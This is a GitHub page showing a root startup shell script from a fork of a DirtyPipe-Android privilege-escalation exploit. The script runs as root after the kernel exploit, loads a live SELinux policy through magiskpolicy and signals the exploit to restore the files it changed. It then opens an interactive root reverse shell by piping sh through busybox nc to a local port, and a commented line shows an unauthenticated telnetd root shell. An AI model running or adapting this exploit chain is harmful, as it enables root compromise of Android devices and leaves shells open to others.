forked from polygraphene/DirtyPipe-Android
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathstartup-root
62 lines (50 loc) · 3.58 KB
/
startup-root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/system/bin/sh
# Called from modprobe-payload
# Now in root user + permissive domain (u:r:vendor_modprobe:s0)
#id > /data/local/tmp/mylog1
#cat /proc/self/status >> /data/local/tmp/mylog1
HOST=127.0.0.1
PORT=10847
export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art
export HOME=/
export ANDROID_TZDATA_ROOT=/apex/com.android.tzdata
export SYSTEMSERVERCLASSPATH=/system/framework/com.android.location.provider.jar:/system/framework/services.jar:/system/framework/ethernet-service.jar:/apex/com.android.appsearch/javalib/service-appsearch.jar:/apex/com.android.media/javalib/service-media-s.jar:/apex/com.android.permission/javalib/service-permission.jar
export TERM=xterm-256color
export ANDROID_SOCKET_adbd=25
export ANDROID_STORAGE=/storage
export EXTERNAL_STORAGE=/sdcard
export DOWNLOAD_CACHE=/data/cache
export ANDROID_ASSETS=/system/app
export DEX2OATBOOTCLASSPATH=/apex/com.android.art/javalib/core-oj.jar:/apex/com.android.art/javalib/core-libart.jar:/apex/com.android.art/javalib/okhttp.jar:/apex/com.android.art/javalib/bouncycastle.jar:/apex/com.android.art/javalib/apache-xml.jar:/system/framework/framework.jar:/system/framework/framework-graphics.jar:/system/framework/ext.jar:/system/framework/telephony-common.jar:/system/framework/voip-common.jar:/system/framework/ims-common.jar:/apex/com.android.i18n/javalib/core-icu4j.jar
export BOOTCLASSPATH=/apex/com.android.art/javalib/core-oj.jar:/apex/com.android.art/javalib/core-libart.jar:/apex/com.android.art/javalib/okhttp.jar:/apex/com.android.art/javalib/bouncycastle.jar:/apex/com.android.art/javalib/apache-xml.jar:/system/framework/framework.jar:/system/framework/framework-graphics.jar:/system/framework/ext.jar:/system/framework/telephony-common.jar:/system/framework/voip-common.jar:/system/framework/ims-common.jar:/apex/com.android.i18n/javalib/core-icu4j.jar:/apex/com.android.appsearch/javalib/framework-appsearch.jar:/apex/com.android.conscrypt/javalib/conscrypt.jar:/apex/com.android.ipsec/javalib/android.net.ipsec.ike.jar:/apex/com.android.media/javalib/updatable-media.jar:/apex/com.android.mediaprovider/javalib/framework-mediaprovider.jar:/apex/com.android.os.statsd/javalib/framework-statsd.jar:/apex/com.android.permission/javalib/framework-permission.jar:/apex/com.android.permission/javalib/framework-permission-s.jar:/apex/com.android.scheduling/javalib/framework-scheduling.jar:/apex/com.android.sdkext/javalib/framework-sdkextensions.jar:/apex/com.android.tethering/javalib/framework-connectivity.jar:/apex/com.android.tethering/javalib/framework-tethering.jar:/apex/com.android.wifi/javalib/framework-wifi.jar
export SHELL=/system/bin/sh
export ANDROID_BOOTLOGO=1
export ASEC_MOUNTPOINT=/mnt/asec
export USER=root
export TMPDIR=/data/local/tmp
export PATH=/product/bin:/apex/com.android.runtime/bin:/apex/com.android.art/bin:/system_ext/bin:/system/bin:/system/xbin:/odm/bin:/vendor/bin:/vendor/xbin
export ANDROID_ROOT=/system
export ANDROID_I18N_ROOT=/apex/com.android.i18n
#/data/local/tmp/magiskpolicy --save /data/local/tmp/policy-dump
/data/local/tmp/magiskpolicy --magisk --live
# Send completion signal to restore files
killall -s SIGUSR1 dirtypipe-android
# INSECURE
# /data/local/tmp/busybox telnetd -l /bin/sh -p 10847 &
# Reverse shell: A little safer
sleep 1
FIFO=/data/local/tmp/reverse-fifo
rm -f $FIFO
mkfifo $FIFO
cat $FIFO | /system/bin/sh -i 2>&1|/data/local/tmp/busybox nc $HOST $PORT > $FIFO
# Work in progress
#mkdir /dev/.magisk
#cd /dev/.magisk || exit
#
#cp /data/local/tmp/magisk/* /dev/.magisk/
#chmod 755 /dev/.magisk/*
#chown root:root /dev/.magisk/*
#
#/dev/.magisk/magisk --daemon
#/data/local/tmp/busybox sleep 3